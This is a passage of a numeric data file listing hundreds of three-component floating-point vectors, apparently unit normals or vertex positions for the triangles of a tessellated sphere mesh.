[-0.0823235809803,-0.39960706234,-0.912982463837],
[0.0823235809803,-0.39960706234,-0.912982463837],
[0.0,-0.266404688358,-0.96386128664],
[-0.907272219658,-0.420543789864,0.0],
[-0.919883430004,-0.373140364885,-0.120750762522],
[-0.863953828812,-0.490634441376,-0.113409027457],
[-0.988273143768,-0.152696594596,0.0],
[-0.988302052021,-0.0801787301898,-0.129731908441],
[-0.963828444481,-0.234579697251,-0.126519307494],
[-0.915502369404,-0.312772929668,-0.253038614988],
[-0.889195740223,-0.240536183119,-0.389195710421],
[-0.846715569496,-0.381741464138,-0.370602428913],
[-0.963828444481,-0.234579697251,-0.126519307494],
[-0.915502369404,-0.312772929668,-0.253038614988],
[-0.919883430004,-0.373140364885,-0.120750762522],
[-0.988273143768,0.152696594596,0.0],
[-0.963828444481,0.234579697251,-0.126519307494],
[-0.988302052021,0.0801787301898,-0.129731908441],
[-0.907272219658,0.420543789864,0.0],
[-0.863953828812,0.490634441376,-0.113409027457],
[-0.919883430004,0.373140364885,-0.120750762522],
[-0.915502369404,0.312772929668,-0.253038614988],
[-0.846715569496,0.381741464138,-0.370602428913],
[-0.889195740223,0.240536183119,-0.389195710421],
[-0.919883430004,0.373140364885,-0.120750762522],
[-0.915502369404,0.312772929668,-0.253038614988],
[-0.963828444481,0.234579697251,-0.126519307494],
[-0.839642524719,-0.16035746038,-0.518927633762],
[-0.770524084568,-0.0781932324171,-0.632596552372],
[-0.752343893051,-0.229044884443,-0.617670714855],
[-0.839642524719,0.16035746038,-0.518927633762],
[-0.752343893051,0.229044884443,-0.617670714855],
[-0.770524084568,0.0781932324171,-0.632596552372],
[-0.689269959927,0.0,-0.724504590034],
[-0.604043483734,0.070090636611,-0.793863236904],
[-0.604043483734,-0.070090636611,-0.793863236904],
[-0.770524084568,0.0781932324171,-0.632596552372],
[-0.689269959927,0.0,-0.724504590034],
[-0.770524084568,-0.0781932324171,-0.632596552372],
[-0.988302052021,0.0801787301898,-0.129731908441],
[-0.96386128664,0.0,-0.266404688358],
[-0.988302052021,-0.0801787301898,-0.129731908441],
[-0.889195740223,0.240536183119,-0.389195710421],
[-0.839642524719,0.16035746038,-0.518927633762],
[-0.912982463837,0.0823235809803,-0.39960706234],
[-0.912982463837,-0.0823235809803,-0.39960706234],
[-0.839642524719,-0.16035746038,-0.518927633762],
[-0.889195740223,-0.240536183119,-0.389195710421],
[-0.912982463837,0.0823235809803,-0.39960706234],
[-0.912982463837,-0.0823235809803,-0.39960706234],
[-0.96386128664,0.0,-0.266404688358],
[-0.793863236904,0.604043483734,-0.070090636611],
[-0.79913264513,0.568519234657,-0.19537883997],
[-0.863953828812,0.490634441376,-0.113409027457],
[-0.617670714855,0.752343893051,-0.229044884443],
[-0.599106371403,0.70991063118,-0.370268076658],
[-0.71078979969,0.644004821777,-0.28290578723],
[-0.788983047009,0.517485499382,-0.331231862307],
[-0.759463787079,0.450446814299,-0.469374448061],
[-0.846715569496,0.381741464138,-0.370602428913],
[-0.71078979969,0.644004821777,-0.28290578723],
[-0.788983047009,0.517485499382,-0.331231862307],
[-0.79913264513,0.568519234657,-0.19537883997],
[-0.370602428913,0.846715569496,-0.381741464138],
[-0.331231862307,0.788983047009,-0.517485499382],
[-0.469374448061,0.759463787079,-0.450446814299],
[-0.113409027457,0.863953828812,-0.490634441376],
[-0.070090636611,0.793863236904,-0.604043483734],
[-0.19537883997,0.79913264513,-0.568519234657],
[-0.28290578723,0.71078979969,-0.644004821777],
[-0.229044884443,0.617670714855,-0.752343893051],
[-0.370268076658,0.599106371403,-0.70991063118],
[-0.19537883997,0.79913264513,-0.568519234657],
[-0.28290578723,0.71078979969,-0.644004821777],
[-0.331231862307,0.788983047009,-0.517485499382],
[-0.70991063118,0.370268076658,-0.599106371403],
[-0.644004821777,0.28290578723,-0.71078979969],
[-0.752343893051,0.229044884443,-0.617670714855],
[-0.450446814299,0.469374448061,-0.759463787079],
[-0.381741464138,0.370602428913,-0.846715569496],
[-0.517485499382,0.331231862307,-0.788983047009],
[-0.568519234657,0.19537883997,-0.79913264513],
[-0.490634441376,0.113409027457,-0.863953828812],
[-0.604043483734,0.070090636611,-0.793863236904],
[-0.517485499382,0.331231862307,-0.788983047009],
[-0.568519234657,0.19537883997,-0.79913264513],
[-0.644004821777,0.28290578723,-0.71078979969],
[-0.469374448061,0.759463787079,-0.450446814299],
[-0.5642542243,0.646577775478,-0.513375461102],
[-0.599106371403,0.70991063118,-0.370268076658],
[-0.370268076658,0.599106371403,-0.70991063118],
[-0.450446814299,0.469374448061,-0.759463787079],
[-0.513375461102,0.5642542243,-0.646577775478],
[-0.646577775478,0.513375461102,-0.5642542243],
[-0.70991063118,0.370268076658,-0.599106371403],
[-0.759463787079,0.450446814299,-0.469374448061],
[-0.513375461102,0.5642542243,-0.646577775478],
[-0.646577775478,0.513375461102,-0.5642542243],
[-0.5642542243,0.646577775478,-0.513375461102],
[0.420543789864,0.0,-0.907272219658],
[0.373140364885,0.120750762522,-0.919883430004],
[0.490634441376,0.113409027457,-0.863953828812],
[0.152696594596,0.0,-0.988273143768],
[0.0801787301898,0.129731908441,-0.988302052021],
[0.234579697251,0.126519307494,-0.963828444481],
[0.312772929668,0.253038614988,-0.915502369404],
[0.240536183119,0.389195710421,-0.889195740223],
[0.381741464138,0.370602428913,-0.846715569496],
[0.234579697251,0.126519307494,-0.963828444481],
[0.312772929668,0.253038614988,-0.915502369404],
[0.373140364885,0.120750762522,-0.919883430004],
[-0.152696594596,0.0,-0.988273143768],
[-0.234579697251,0.126519307494,-0.963828444481],
[-0.0801787301898,0.129731908441,-0.988302052021],
[-0.420543789864,0.0,-0.907272219658],
[-0.490634441376,0.113409027457,-0.863953828812],
[-0.373140364885,0.120750762522,-0.919883430004],
[-0.312772929668,0.253038614988,-0.915502369404],
[-0.381741464138,0.370602428913,-0.846715569496],
[-0.240536183119,0.389195710421,-0.889195740223],
[-0.373140364885,0.120750762522,-0.919883430004],
[-0.312772929668,0.253038614988,-0.915502369404],
[-0.234579697251,0.126519307494,-0.963828444481],
[0.16035746038,0.518927633762,-0.839642524719],
[0.0781932324171,0.632596552372,-0.770524084568],
[0.229044884443,0.617670714855,-0.752343893051],
[-0.16035746038,0.518927633762,-0.839642524719],
[-0.229044884443,0.617670714855,-0.752343893051],
[-0.0781932324171,0.632596552372,-0.770524084568],
[0.0,0.724504590034,-0.689269959927],
[-0.070090636611,0.793863236904,-0.604043483734],
[0.070090636611,0.793863236904,-0.604043483734],
[-0.0781932324171,0.632596552372,-0.770524084568],
[0.0,0.724504590034,-0.689269959927],
[0.0781932324171,0.632596552372,-0.770524084568],
[-0.0801787301898,0.129731908441,-0.988302052021],
[0.0,0.266404688358,-0.96386128664],
[0.0801787301898,0.129731908441,-0.988302052021],
[-0.240536183119,0.389195710421,-0.889195740223],
[-0.16035746038,0.518927633762,-0.839642524719],
[-0.0823235809803,0.39960706234,-0.912982463837],
[0.0823235809803,0.39960706234,-0.912982463837],
[0.16035746038,0.518927633762,-0.839642524719],
[0.240536183119,0.389195710421,-0.889195740223],
[-0.0823235809803,0.39960706234,-0.912982463837],
[0.0823235809803,0.39960706234,-0.912982463837],
[0.0,0.266404688358,-0.96386128664],
[0.490634441376,0.113409027457,-0.863953828812],
[0.568519234657,0.19537883997,-0.79913264513],
[0.604043483734,0.070090636611,-0.793863236904],
[0.381741464138,0.370602428913,-0.846715569496],
[0.450446814299,0.469374448061,-0.759463787079],
[0.517485499382,0.331231862307,-0.788983047009],
[0.644004821777,0.28290578723,-0.71078979969],
[0.70991063118,0.370268076658,-0.599106371403],
[0.752343893051,0.229044884443,-0.617670714855],
[0.517485499382,0.331231862307,-0.788983047009],
[0.644004821777,0.28290578723,-0.71078979969],
[0.568519234657,0.19537883997,-0.79913264513],
[0.229044884443,0.617670714855,-0.752343893051],
[0.28290578723,0.71078979969,-0.644004821777],
[0.370268076658,0.599106371403,-0.70991063118],
[0.070090636611,0.793863236904,-0.604043483734],
[0.113409027457,0.863953828812,-0.490634441376],
[0.19537883997,0.79913264513,-0.568519234657],
[0.331231862307,0.788983047009,-0.517485499382],
[0.370602428913,0.846715569496,-0.381741464138],
[0.469374448061,0.759463787079,-0.450446814299],
[0.19537883997,0.79913264513,-0.568519234657],
[0.331231862307,0.788983047009,-0.517485499382],
[0.28290578723,0.71078979969,-0.644004821777],
[0.759463787079,0.450446814299,-0.469374448061],
[0.788983047009,0.517485499382,-0.331231862307],
[0.846715569496,0.381741464138,-0.370602428913],
[0.599106371403,0.70991063118,-0.370268076658],
[0.617670714855,0.752343893051,-0.229044884443],
[0.71078979969,0.644004821777,-0.28290578723],
[0.79913264513,0.568519234657,-0.19537883997],
[0.793863236904,0.604043483734,-0.070090636611],
[0.863953828812,0.490634441376,-0.113409027457],
[0.71078979969,0.644004821777,-0.28290578723],
[0.79913264513,0.568519234657,-0.19537883997],
[0.788983047009,0.517485499382,-0.331231862307],
[0.370268076658,0.599106371403,-0.70991063118],
[0.513375461102,0.5642542243,-0.646577775478],
[0.450446814299,0.469374448061,-0.759463787079],
[0.469374448061,0.759463787079,-0.450446814299],
[0.599106371403,0.70991063118,-0.370268076658],
[0.5642542243,0.646577775478,-0.513375461102],
[0.646577775478,0.513375461102,-0.5642542243],
[0.759463787079,0.450446814299,-0.469374448061],
[0.70991063118,0.370268076658,-0.599106371403],
[0.5642542243,0.646577775478,-0.513375461102],
[0.646577775478,0.513375461102,-0.5642542243],
[0.513375461102,0.5642542243,-0.646577775478],
[0.793863236904,0.604043483734,-0.070090636611],
[0.724504590034,0.689269959927,0.0],
[0.793863236904,0.604043483734,0.070090636611],
[0.617670714855,0.752343893051,-0.229044884443],
[0.518927633762,0.839642524719,-0.16035746038],
[0.632596552372,0.770524084568,-0.0781932324171],
[0.632596552372,0.770524084568,0.0781932324171],
[0.518927633762,0.839642524719,0.16035746038],
[0.617670714855,0.752343893051,0.229044884443],
[0.632596552372,0.770524084568,-0.0781932324171],
[0.632596552372,0.770524084568,0.0781932324171],
[0.724504590034,0.689269959927,0.0],
[0.370602428913,0.846715569496,-0.381741464138],
[0.253038614988,0.915502369404,-0.312772929668],
[0.389195710421,0.889195740223,-0.240536183119],
[0.113409027457,0.863953828812,-0.490634441376],
[0.0,0.907272219658,-0.420543789864],
[0.120750762522,0.919883430004,-0.373140364885],
[0.126519307494,0.963828444481,-0.234579697251],
[0.0,0.988273143768,-0.152696594596],
[0.129731908441,0.988302052021,-0.0801787301898],
[0.120750762522,0.919883430004,-0.373140364885],
[0.126519307494,0.963828444481,-0.234579697251],
[0.253038614988,0.915502369404,-0.312772929668],
[0.389195710421,0.889195740223,0.240536183119],
[0.253038614988,0.915502369404,0.312772929668],
[0.370602428913,0.846715569496,0.381741464138],
[0.129731908441,0.988302052021,0.0801787301898],
[0.0,0.988273143768,0.152696594596],
[0.126519307494,0.963828444481,0.234579697251],
[0.120750762522,0.919883430004,0.373140364885],
[0.0,0.907272219658,0.420543789864],
[0.113409027457,0.863953828812,0.490634441376],
[0.126519307494,0.963828444481,0.234579697251],
[0.120750762522,0.919883430004,0.373140364885],
[0.253038614988,0.915502369404,0.312772929668],
[0.389195710421,0.889195740223,-0.240536183119],
[0.39960706234,0.912982463837,-0.0823235809803],
[0.518927633762,0.839642524719,-0.16035746038],
[0.129731908441,0.988302052021,-0.0801787301898],
[0.129731908441,0.988302052021,0.0801787301898],
[0.266404688358,0.96386128664,0.0],
[0.39960706234,0.912982463837,0.0823235809803],
[0.389195710421,0.889195740223,0.240536183119],
[0.518927633762,0.839642524719,0.16035746038],
[0.266404688358,0.96386128664,0.0],
[0.39960706234,0.912982463837,0.0823235809803],
[0.39960706234,0.912982463837,-0.0823235809803],
[0.793863236904,0.604043483734,0.070090636611],
[0.79913264513,0.568519234657,0.19537883997],
[0.863953828812,0.490634441376,0.113409027457],
[0.617670714855,0.752343893051,0.229044884443],
[0.599106371403,0.70991063118,0.370268076658],
[0.71078979969,0.644004821777,0.28290578723],
[0.788983047009,0.517485499382,0.331231862307],
[0.759463787079,0.450446814299,0.469374448061],
[0.846715569496,0.381741464138,0.370602428913],
[0.71078979969,0.644004821777,0.28290578723],
[0.788983047009,0.517485499382,0.331231862307],
[0.79913264513,0.568519234657,0.19537883997],
[0.370602428913,0.846715569496,0.381741464138],
[0.331231862307,0.788983047009,0.517485499382],
[0.469374448061,0.759463787079,0.450446814299],
[0.113409027457,0.863953828812,0.490634441376],
[0.070090636611,0.793863236904,0.604043483734],
[0.19537883997,0.79913264513,0.568519234657],
[0.28290578723,0.71078979969,0.644004821777],
[0.229044884443,0.617670714855,0.752343893051],
[0.370268076658,0.599106371403,0.70991063118],
[0.19537883997,0.79913264513,0.568519234657],
[0.28290578723,0.71078979969,0.644004821777],
[0.331231862307,0.788983047009,0.517485499382],
[0.70991063118,0.370268076658,0.599106371403],
[0.644004821777,0.28290578723,0.71078979969],
[0.752343893051,0.229044884443,0.617670714855],
[0.450446814299,0.469374448061,0.759463787079],
[0.381741464138,0.370602428913,0.846715569496],
[0.517485499382,0.331231862307,0.788983047009],
[0.568519234657,0.19537883997,0.79913264513],
[0.490634441376,0.113409027457,0.863953828812],
[0.604043483734,0.070090636611,0.793863236904],
[0.517485499382,0.331231862307,0.788983047009],
[0.568519234657,0.19537883997,0.79913264513],
[0.644004821777,0.28290578723,0.71078979969],
[0.469374448061,0.759463787079,0.450446814299],
[0.5642542243,0.646577775478,0.513375461102],
[0.599106371403,0.70991063118,0.370268076658],
[0.370268076658,0.599106371403,0.70991063118],
[0.450446814299,0.469374448061,0.759463787079],
[0.513375461102,0.5642542243,0.646577775478],
[0.646577775478,0.513375461102,0.5642542243],
[0.70991063118,0.370268076658,0.599106371403],
[0.759463787079,0.450446814299,0.469374448061],
[0.513375461102,0.5642542243,0.646577775478],
[0.646577775478,0.513375461102,0.5642542243],
[0.5642542243,0.646577775478,0.513375461102],
[0.907272219658,-0.420543789864,0.0],
[0.919883430004,-0.373140364885,0.120750762522],
[0.863953828812,-0.490634441376,0.113409027457],
[0.988273143768,-0.152696594596,0.0],
[0.988302052021,-0.0801787301898,0.129731908441],
[0.963828444481,-0.234579697251,0.126519307494],
[0.915502369404,-0.312772929668,0.253038614988],
[0.889195740223,-0.240536183119,0.389195710421],
[0.846715569496,-0.381741464138,0.370602428913],
[0.963828444481,-0.234579697251,0.126519307494],
[0.915502369404,-0.312772929668,0.253038614988],
[0.919883430004,-0.373140364885,0.120750762522],
[0.988273143768,0.152696594596,0.0],
[0.963828444481,0.234579697251,0.126519307494],
[0.988302052021,0.0801787301898,0.129731908441],
[0.907272219658,0.420543789864,0.0],
[0.863953828812,0.490634441376,0.113409027457],
[0.919883430004,0.373140364885,0.120750762522],
[0.915502369404,0.312772929668,0.253038614988],
[0.846715569496,0.381741464138,0.370602428913],
[0.889195740223,0.240536183119,0.389195710421],
[0.919883430004,0.373140364885,0.120750762522],
[0.915502369404,0.312772929668,0.253038614988],
[0.963828444481,0.234579697251,0.126519307494],
[0.839642524719,-0.16035746038,0.518927633762],
[0.770524084568,-0.0781932324171,0.632596552372],
[0.752343893051,-0.229044884443,0.617670714855],
[0.839642524719,0.16035746038,0.518927633762],
[0.752343893051,0.229044884443,0.617670714855],
[0.770524084568,0.0781932324171,0.632596552372],
[0.689269959927,0.0,0.724504590034],
[0.604043483734,0.070090636611,0.793863236904],
[0.604043483734,-0.070090636611,0.793863236904],
[0.770524084568,0.0781932324171,0.632596552372],
[0.689269959927,0.0,0.724504590034],
[0.770524084568,-0.0781932324171,0.632596552372],
[0.988302052021,0.0801787301898,0.129731908441],
[0.96386128664,0.0,0.266404688358],
[0.988302052021,-0.0801787301898,0.129731908441],
[0.889195740223,0.240536183119,0.389195710421],
[0.839642524719,0.16035746038,0.518927633762],
[0.912982463837,0.0823235809803,0.39960706234],
[0.912982463837,-0.0823235809803,0.39960706234],
[0.839642524719,-0.16035746038,0.518927633762],
[0.889195740223,-0.240536183119,0.389195710421],
[0.912982463837,0.0823235809803,0.39960706234],
[0.912982463837,-0.0823235809803,0.39960706234],
[0.96386128664,0.0,0.266404688358],
[-0.604043483734,0.070090636611,0.793863236904],
[-0.689269959927,0.0,0.724504590034],
[-0.604043483734,-0.070090636611,0.793863236904],
[-0.752343893051,0.229044884443,0.617670714855],
[-0.839642524719,0.16035746038,0.518927633762],
[-0.770524084568,0.0781932324171,0.632596552372],
[-0.770524084568,-0.0781932324171,0.632596552372],
[-0.839642524719,-0.16035746038,0.518927633762],
[-0.752343893051,-0.229044884443,0.617670714855],
[-0.770524084568,0.0781932324171,0.632596552372],
[-0.770524084568,-0.0781932324171,0.632596552372],
[-0.689269959927,0.0,0.724504590034],
[-0.846715569496,0.381741464138,0.370602428913],
[-0.915502369404,0.312772929668,0.253038614988],
[-0.889195740223,0.240536183119,0.389195710421],
[-0.863953828812,0.490634441376,0.113409027457],
[-0.907272219658,0.420543789864,0.0],
[-0.919883430004,0.373140364885,0.120750762522],
[-0.963828444481,0.234579697251,0.126519307494],
[-0.988273143768,0.152696594596,0.0],
[-0.988302052021,0.0801787301898,0.129731908441],
[-0.919883430004,0.373140364885,0.120750762522],
[-0.963828444481,0.234579697251,0.126519307494],
[-0.915502369404,0.312772929668,0.253038614988],
[-0.889195740223,-0.240536183119,0.389195710421],
[-0.915502369404,-0.312772929668,0.253038614988],
[-0.846715569496,-0.381741464138,0.370602428913],
[-0.988302052021,-0.0801787301898,0.129731908441],
[-0.988273143768,-0.152696594596,0.0],
[-0.963828444481,-0.234579697251,0.126519307494],
[-0.919883430004,-0.373140364885,0.120750762522],
[-0.907272219658,-0.420543789864,0.0],
[-0.863953828812,-0.490634441376,0.113409027457],
[-0.963828444481,-0.234579697251,0.126519307494],
[-0.919883430004,-0.373140364885,0.120750762522],
[-0.915502369404,-0.312772929668,0.253038614988],
[-0.889195740223,0.240536183119,0.389195710421],
[-0.912982463837,0.0823235809803,0.39960706234],
[-0.839642524719,0.16035746038,0.518927633762],
[-0.988302052021,0.0801787301898,0.129731908441],
[-0.988302052021,-0.0801787301898,0.129731908441],
[-0.96386128664,0.0,0.266404688358],
[-0.912982463837,-0.0823235809803,0.39960706234],
[-0.889195740223,-0.240536183119,0.389195710421],
[-0.839642524719,-0.16035746038,0.518927633762],
[-0.96386128664,0.0,0.266404688358],
[-0.912982463837,-0.0823235809803,0.39960706234],
[-0.912982463837,0.0823235809803,0.39960706234],
[-0.490634441376,0.113409027457,0.863953828812],
[-0.568519234657,0.19537883997,0.79913264513],
[-0.604043483734,0.070090636611,0.793863236904],
[-0.381741464138,0.370602428913,0.846715569496],
[-0.450446814299,0.469374448061,0.759463787079],
[-0.517485499382,0.331231862307,0.788983047009],
[-0.644004821777,0.28290578723,0.71078979969],
[-0.70991063118,0.370268076658,0.599106371403],
[-0.752343893051,0.229044884443,0.617670714855],
[-0.517485499382,0.331231862307,0.788983047009],
[-0.644004821777,0.28290578723,0.71078979969],
[-0.568519234657,0.19537883997,0.79913264513],
[-0.229044884443,0.617670714855,0.752343893051],
[-0.28290578723,0.71078979969,0.644004821777],
[-0.370268076658,0.599106371403,0.70991063118],
[-0.070090636611,0.793863236904,0.604043483734],
[-0.113409027457,0.863953828812,0.490634441376],
[-0.19537883997,0.79913264513,0.568519234657],
[-0.331231862307,0.788983047009,0.517485499382],
[-0.370602428913,0.846715569496,0.381741464138],
[-0.469374448061,0.759463787079,0.450446814299],
[-0.19537883997,0.79913264513,0.568519234657],
[-0.331231862307,0.788983047009,0.517485499382],
[-0.28290578723,0.71078979969,0.644004821777],
[-0.759463787079,0.450446814299,0.469374448061],
[-0.788983047009,0.517485499382,0.331231862307],
[-0.846715569496,0.381741464138,0.370602428913],
[-0.599106371403,0.70991063118,0.370268076658],
[-0.617670714855,0.752343893051,0.229044884443],
[-0.71078979969,0.644004821777,0.28290578723],
[-0.79913264513,0.568519234657,0.19537883997],
[-0.793863236904,0.604043483734,0.070090636611],
[-0.863953828812,0.490634441376,0.113409027457],
[-0.71078979969,0.644004821777,0.28290578723],
[-0.79913264513,0.568519234657,0.19537883997],
[-0.788983047009,0.517485499382,0.331231862307],
[-0.370268076658,0.599106371403,0.70991063118],
[-0.513375461102,0.5642542243,0.646577775478],
[-0.450446814299,0.469374448061,0.759463787079],
[-0.469374448061,0.759463787079,0.450446814299],
[-0.599106371403,0.70991063118,0.370268076658],
[-0.5642542243,0.646577775478,0.513375461102],
[-0.646577775478,0.513375461102,0.5642542243],
[-0.759463787079,0.450446814299,0.469374448061],
[-0.70991063118,0.370268076658,0.599106371403],
[-0.5642542243,0.646577775478,0.513375461102],
[-0.646577775478,0.513375461102,0.5642542243],
[-0.513375461102,0.5642542243,0.646577775478],
[-0.070090636611,0.793863236904,0.604043483734],
[0.0,0.724504590034,0.689269959927],
[0.070090636611,0.793863236904,0.604043483734],
[-0.229044884443,0.617670714855,0.752343893051],
[-0.16035746038,0.518927633762,0.839642524719],
[-0.0781932324171,0.632596552372,0.770524084568],
[0.0781932324171,0.632596552372,0.770524084568],
[0.16035746038,0.518927633762,0.839642524719],
[0.229044884443,0.617670714855,0.752343893051],
[-0.0781932324171,0.632596552372,0.770524084568],
[0.0781932324171,0.632596552372,0.770524084568],
[0.0,0.724504590034,0.689269959927],
[-0.381741464138,0.370602428913,0.846715569496],
[-0.312772929668,0.253038614988,0.915502369404],
[-0.240536183119,0.389195710421,0.889195740223],
[-0.490634441376,0.113409027457,0.863953828812],
[-0.420543789864,0.0,0.907272219658],
[-0.373140364885,0.120750762522,0.919883430004],
[-0.234579697251,0.126519307494,0.963828444481],
[-0.152696594596,0.0,0.988273143768],
[-0.0801787301898,0.129731908441,0.988302052021],
[-0.373140364885,0.120750762522,0.919883430004],
[-0.234579697251,0.126519307494,0.963828444481],
[-0.312772929668,0.253038614988,0.915502369404],
[0.240536183119,0.389195710421,0.889195740223],
[0.312772929668,0.253038614988,0.915502369404],
[0.381741464138,0.370602428913,0.846715569496],
[0.0801787301898,0.129731908441,0.988302052021],
[0.152696594596,0.0,0.988273143768],
[0.234579697251,0.126519307494,0.963828444481],
[0.373140364885,0.120750762522,0.919883430004],
[0.420543789864,0.0,0.907272219658],
[0.490634441376,0.113409027457,0.863953828812],
[0.234579697251,0.126519307494,0.963828444481],
[0.373140364885,0.120750762522,0.919883430004],
[0.312772929668,0.253038614988,0.915502369404],
[-0.240536183119,0.389195710421,0.889195740223],
[-0.0823235809803,0.39960706234,0.912982463837],
[-0.16035746038,0.518927633762,0.839642524719],
[-0.0801787301898,0.129731908441,0.988302052021],
[0.0801787301898,0.129731908441,0.988302052021],
[0.0,0.266404688358,0.96386128664],
[0.0823235809803,0.39960706234,0.912982463837],
[0.240536183119,0.389195710421,0.889195740223],
[0.16035746038,0.518927633762,0.839642524719],
[0.0,0.266404688358,0.96386128664],
[0.0823235809803,0.39960706234,0.912982463837],
[-0.0823235809803,0.39960706234,0.912982463837],
[-0.113409027457,0.863953828812,-0.490634441376],
[-0.120750762522,0.919883430004,-0.373140364885],
[0.0,0.907272219658,-0.420543789864],
[-0.370602428913,0.846715569496,-0.381741464138],
[-0.389195710421,0.889195740223,-0.240536183119],
[-0.253038614988,0.915502369404,-0.312772929668],
[-0.126519307494,0.963828444481,-0.234579697251],
[-0.129731908441,0.988302052021,-0.0801787301898],
[0.0,0.988273143768,-0.152696594596],
[-0.253038614988,0.915502369404,-0.312772929668],
[-0.126519307494,0.963828444481,-0.234579697251],
[-0.120750762522,0.919883430004,-0.373140364885],
[-0.617670714855,0.752343893051,-0.229044884443],
[-0.632596552372,0.770524084568,-0.0781932324171],
[-0.518927633762,0.839642524719,-0.16035746038],
[-0.793863236904,0.604043483734,-0.070090636611],
[-0.793863236904,0.604043483734,0.070090636611],
[-0.724504590034,0.689269959927,0.0],
[-0.632596552372,0.770524084568,0.0781932324171],
[-0.617670714855,0.752343893051,0.229044884443],
[-0.518927633762,0.839642524719,0.16035746038],
[-0.724504590034,0.689269959927,0.0],
[-0.632596552372,0.770524084568,0.0781932324171],
[-0.632596552372,0.770524084568,-0.0781932324171],
[-0.129731908441,0.988302052021,0.0801787301898],
[-0.126519307494,0.963828444481,0.234579697251],
[0.0,0.988273143768,0.152696594596],
[-0.389195710421,0.889195740223,0.240536183119],
[-0.370602428913,0.846715569496,0.381741464138],
[-0.253038614988,0.915502369404,0.312772929668],
[-0.120750762522,0.919883430004,0.373140364885],
[-0.113409027457,0.863953828812,0.490634441376],
[0.0,0.907272219658,0.420543789864],
[-0.253038614988,0.915502369404,0.312772929668],
[-0.120750762522,0.919883430004,0.373140364885],
[-0.126519307494,0.963828444481,0.234579697251],
[-0.518927633762,0.839642524719,-0.16035746038],
[-0.39960706234,0.912982463837,-0.0823235809803],
[-0.389195710421,0.889195740223,-0.240536183119],
[-0.518927633762,0.839642524719,0.16035746038],
[-0.389195710421,0.889195740223,0.240536183119],
[-0.39960706234,0.912982463837,0.0823235809803],
[-0.266404688358,0.96386128664,0.0],
[-0.129731908441,0.988302052021,0.0801787301898],
[-0.129731908441,0.988302052021,-0.0801787301898],
[-0.39960706234,0.912982463837,0.0823235809803],
[-0.266404688358,0.96386128664,0.0],
[-0.39960706234,0.912982463837,-0.0823235809803],
[0.604043483734,0.070090636611,-0.793863236904],
[0.689269959927,0.0,-0.724504590034],
[0.604043483734,-0.070090636611,-0.793863236904],
[0.752343893051,0.229044884443,-0.617670714855],
[0.839642524719,0.16035746038,-0.518927633762],
[0.770524084568,0.0781932324171,-0.632596552372],
[0.770524084568,-0.0781932324171,-0.632596552372],
[0.839642524719,-0.16035746038,-0.518927633762],
[0.752343893051,-0.229044884443,-0.617670714855],
[0.770524084568,0.0781932324171,-0.632596552372],
[0.770524084568,-0.0781932324171,-0.632596552372],
[0.689269959927,0.0,-0.724504590034],
[0.846715569496,0.381741464138,-0.370602428913],
[0.915502369404,0.312772929668,-0.253038614988],
[0.889195740223,0.240536183119,-0.389195710421],
[0.863953828812,0.490634441376,-0.113409027457],
[0.907272219658,0.420543789864,0.0],
[0.919883430004,0.373140364885,-0.120750762522],
[0.963828444481,0.234579697251,-0.126519307494],
[0.988273143768,0.152696594596,0.0],
[0.988302052021,0.0801787301898,-0.129731908441],
[0.919883430004,0.373140364885,-0.120750762522],
[0.963828444481,0.234579697251,-0.126519307494],
[0.915502369404,0.312772929668,-0.253038614988],
[0.889195740223,-0.240536183119,-0.389195710421],
[0.915502369404,-0.312772929668,-0.253038614988],
[0.846715569496,-0.381741464138,-0.370602428913],
[0.988302052021,-0.0801787301898,-0.129731908441],
[0.988273143768,-0.152696594596,0.0],
[0.963828444481,-0.234579697251,-0.126519307494],
[0.919883430004,-0.373140364885,-0.120750762522],
[0.907272219658,-0.420543789864,0.0],
[0.863953828812,-0.490634441376,-0.113409027457],
[0.963828444481,-0.234579697251,-0.126519307494],
[0.919883430004,-0.373140364885,-0.120750762522],
[0.915502369404,-0.312772929668,-0.253038614988],
[0.889195740223,0.240536183119,-0.389195710421],
[0.912982463837,0.0823235809803,-0.39960706234],
[0.839642524719,0.16035746038,-0.518927633762],
[0.988302052021,0.0801787301898,-0.129731908441],
[0.988302052021,-0.0801787301898,-0.129731908441],
[0.96386128664,0.0,-0.266404688358],
[0.912982463837,-0.0823235809803,-0.39960706234],
[0.889195740223,-0.240536183119,-0.389195710421],
[0.839642524719,-0.16035746038,-0.518927633762],
[0.96386128664,0.0,-0.266404688358],
[0.912982463837,-0.0823235809803,-0.39960706234],
[0.912982463837,0.0823235809803,-0.39960706234],
[-0.82464236021,-0.564633131027,0.0339771322906],
[-0.79582041502,-0.605532705784,0.0],
[-0.82464236021,-0.564633131027,-0.0339771322906],
[-0.757922053337,-0.643326640129,0.108097285032],
[-0.722495436668,-0.687358558178,0.0744211226702],
[-0.761889100075,-0.646693944931,0.0362210273743],
[-0.761889100075,-0.646693944931,-0.0362210273743],
[-0.722495436668,-0.687358558178,-0.0744211226702],
[-0.757922053337,-0.643326640129,-0.108097285032],
[-0.761889100075,-0.646693944931,0.0362210273743],
[-0.761889100075,-0.646693944931,-0.0362210273743],
[-0.79582041502,-0.605532705784,0.0],
[-0.669747889042,-0.718357801437,0.188148602843],
[-0.62687343359,-0.763553202152,0.154971644282],
[-0.677466154099,-0.726636230946,0.114190116525],
[-0.560828924179,-0.782811582088,0.269586592913],
[-0.510783493519,-0.826465010643,0.236761152744],
[-0.571085453033,-0.797127783298,0.196083456278],
[-0.578244268894,-0.807120084763,0.119124859571],
[-0.524005174637,-0.847858190536,0.0809632539749],
[-0.581926107407,-0.81225925684,0.0399611219764],
[-0.571085453033,-0.797127783298,0.196083456278],
[-0.578244268894,-0.807120084763,0.119124859571],
[-0.62687343359,-0.763553202152,0.154971644282],
[-0.677466154099,-0.726636230946,-0.114190116525],
[-0.62687343359,-0.763553202152,-0.154971644282],
[-0.669747889042,-0.718357801437,-0.188148602843],
[-0.581926107407,-0.81225925684,-0.0399611219764],
[-0.524005174637,-0.847858190536,-0.0809632539749],
[-0.578244268894,-0.807120084763,-0.119124859571],
[-0.571085453033,-0.797127783298,-0.196083456278],
[-0.510783493519,-0.826465010643,-0.236761152744],
[-0.560828924179,-0.782811582088,-0.269586592913],
[-0.578244268894,-0.807120084763,-0.119124859571],
[-0.571085453033,-0.797127783298,-0.196083456278],
[-0.62687343359,-0.763553202152,-0.154971644282],
[-0.677466154099,-0.726636230946,0.114190116525],
[-0.68142670393,-0.730884253979,0.0382858961821],
[-0.722495436668,-0.687358558178,0.0744211226702],
[-0.581926107407,-0.81225925684,0.0399611219764],
[-0.581926107407,-0.81225925684,-0.0399611219764],
[-0.634539365768,-0.772890508175,0.0],
[-0.68142670393,-0.730884253979,-0.0382858961821],
[-0.677466154099,-0.726636230946,-0.114190116525],
